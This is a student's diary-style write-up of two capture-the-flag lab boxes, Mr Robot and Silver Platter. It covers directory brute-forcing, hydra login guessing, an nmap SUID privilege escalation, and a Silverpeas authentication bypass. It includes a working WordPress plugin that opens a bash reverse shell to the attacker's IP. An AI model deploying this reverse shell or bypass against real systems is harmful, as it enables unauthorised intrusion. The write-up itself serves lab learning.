Today was really cool. We did the Mr Robot CTF challenge today and by the end of the day Kevin gave us more challenges to do.
The lab only asks for three keys and doesn’t provide any info. So, First thing I did was an nmap scan.
Since ports 80,443 are opened, I opened a browser to see what’s inside. The main website was all about Mr Robot references, which I kind of enjoyed.
After that I used gobuster:
gobuster dir -u http://10.10.122.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtThat’s when things got interesting. I found some useful directories, including the first key and a custom dictionary file. (Side note: Mathieu later told me the username and password were literally just hidden in plain sight on one of those pages. Scroll down, people!)
I only tried to use that dictionary after rockyou.txt and wasted some time on it, but I learned I should’ve probably paid more attention. I just didn’t think it was very realistic to put a dictionary with their password inside the website.
So, to find the right username I used hydra by using the http-post-form: F=Invalid username.
Then I did the same thing to find the password and logged in into the WordPress site.
Now, How can I create a reverse shell now? I can create a simple plugin:
<?php
/*
Plugin Name: Shell
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.21.157.185/1337 0>&1'");
?>With my listener running, I triggered the plugin and boom, reverse shell acquired.
After running some recon commands (whoami, pwd) I used:
find / -perm -4000 -type f 2>/dev/nullAnd I found an old version of nmap which can be used to privilege escalation the machine by using the –interactive command.
After that i just located the flags with:
find / -name "key-2-of-3.txt" 2>/dev/nullIt was a really fun challenge!
By the end of the day i started another challenge with Adil and Mahtieu. It was called Silver Platter. Now this, was a tough one.
We scanned the target and found some ports opened. We used gobuster but no luck in there also.
Adil tried to brute-force the ssh with a user we found on a website but we got nothing. Then he had to leave for a meeting he was gonna have with some of our other class mates in Berlin. Wish I could have had some beers with them too!
It was me and Mathieu now. We spent so much time doing recon. I was lost but than Mathieu found something: silverplatter.thm:8080/silverpeas
That was what we needed to get started and from there we found the platform was vulnerable to a trivial authentication bypass: https://gist.github.com/ChrisPritchard/4b6d5c70d9329ef116266a6c238dcb2d
We just had to remove the password field in the authentication request.
Then we logged in with the account from earlier and got our first flag!
After that we spent some time trying to figure out the next step and i finally found some other users on the platform and used the same way to bypass authentication and logged in as Manager.
We got ssh credentials!
After that it was the tricky part. I ran:
find / -perm -4000 -type f 2>/dev/nullAnd found a vulnerability in Pkexec.
Then we both tried the Pwnkit exploit to try to privilege escalation our way into the root user, but nothing was working. I tried that for maybe 2 hours. I was always getting an error and trying to fix it but i just couldn’t make it work.
Eventually, we dug into system logs and discovered that the user Tyler had root privileges. Since Tim was in the admin group, he had access to logs, where we found a database password and it worked for Tyler!
Logged in as root at last… to find the last flag!
It ONLY took us six hours to complete the Silver Platter challenge. Kevin did warn us we’d be here all night. Back-to-back CTFs like this are exhausting but very rewarding.
